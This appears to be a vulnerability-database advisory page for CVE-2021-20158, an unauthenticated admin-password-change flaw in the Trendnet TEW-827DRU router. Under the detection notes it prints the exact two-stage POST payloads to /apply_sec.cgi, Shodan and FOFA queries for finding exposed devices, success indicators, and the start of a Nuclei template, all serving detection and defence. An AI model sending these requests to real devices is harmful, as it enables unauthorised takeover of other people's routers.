CVE-2021-20158
published 2021-12-30CVE-2021-20158: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the…
PriorityP274critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
10.77%
95.3th percentile
Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trendnet | tew-827dru_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}↗
commandhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=↗
- →Detect exploit attempts by monitoring POST requests to /apply_sec.cgi containing the hidden action parameter 'tools_admin_elecom', which is the hidden administrative command used to bypass authentication and change the admin password. ↗
- →A successful exploitation results in a 200 OK HTML response body containing all of: 'setConnectDevice', 'setInternet', 'setWlanSSID', and 'TEW-827DRU' — use these as confirmation indicators after the password-change POST. ↗
- →The attack is two-stage: first POST to /apply_sec.cgi with action=tools_admin_elecom to set a new password unauthenticated, then POST again to /apply_sec.cgi with action=do_graph_auth using the newly set base64-encoded password to confirm login — both requests require no prior session. ↗
- →Identify exposed Trendnet TEW-827DRU devices via Shodan query http.html:"TEW-827DRU" or FOFA query body="tew-827dru" to enumerate attack surface. ↗
- ·The vulnerability is specific to firmware version 2.08B01 of the Trendnet TEW-827DRU (CPE: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01). Detection rules should be scoped to this firmware version to avoid false positives on patched devices. ↗
- ·The exploit requires no authentication (PR:N, UI:N per CVSS), meaning any unauthenticated network request to /apply_sec.cgi with action=tools_admin_elecom is inherently suspicious and should be alerted on regardless of source IP. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
nuclei·CVSS 5.3
CVE-2021-20158 [MEDIUM] Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
Template:
id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
impact: |
An attacker with authenticated access can gain unauthorized control over the affected device.
remediation: |
Upgrade to the latest firmwa
2021-12-30
Published